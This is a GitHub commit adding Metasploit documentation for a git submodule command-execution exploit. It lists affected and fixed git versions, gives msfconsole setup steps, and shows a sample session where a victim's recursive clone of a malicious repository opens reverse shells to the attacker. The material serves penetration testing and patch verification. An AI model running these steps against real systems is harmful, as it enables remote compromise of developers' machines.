Skip to content

Commit 5631ddc

Browse files
timwrtimwr
committed
add docs for the git submodule vulnerability
1 parent 39299c0 commit 5631ddc

File tree

1 file changed

+62
-0
lines changed

1 file changed

+62
-0
lines changed

documentation/modules/exploit/multi/http/git_submodule_exec.md

Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
## Vulnerable Application
2+
3+
Git can be installed on a variety of operating systems, however
4+
newer versions may contain the patch for this vulnerability.
5+
6+
On OSX it can be installed with the XCode command line tools:
7+
```xcode-select --install```
8+
9+
On Linux it can be installed with apt:
10+
```sudo apt-get update && sudo apt-get install git```
11+
12+
You can check the version with ```git --version```.
13+
The fix is included in the following version:
14+
2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
15+
16+
## Verification Steps
17+
18+
Example steps in this format:
19+
20+
1. Install the application
21+
1. Start msfconsole
22+
1. Do: ```use exploit/multi/http/git_submodule_command_exec```
23+
1. Do: ```set SRVHOST [local host]```
24+
1. Do: ```set LHOST [local host]```
25+
1. Do: ```exploit```
26+
1. Clone the malicous Git URI and its submodules
27+
1. You should get a shell
28+
29+
## Options
30+
31+
**GIT_URI**
32+
33+
This is the URI the git repository will be hosted from (defaults to random).
34+
35+
**GIT_SUBMODULE**
36+
37+
This is the URI of the submodule within the git repository (defaults to random).
38+
The url of this submodule, when cloned, will execute the payload.
39+
40+
## Scenarios
41+
42+
Example usage against a macOS Sierra x64 bit target running git version 2.10.1
43+
44+
```
45+
msf > use exploit/multi/http/git_submodule_command_exec
46+
msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
47+
SRVHOST => 192.168.0.1
48+
msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
49+
LHOST => 192.168.0.1
50+
msf exploit(git_submodule_command_exec) > exploit
51+
[*] Exploit running as background job.
52+
53+
[*] Started reverse TCP handler on 192.168.0.1:4444
54+
msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
55+
[*] Server started.
56+
[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
57+
***
58+
Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
59+
***
60+
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
61+
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800
62+
```

0 commit comments

Comments
 (0)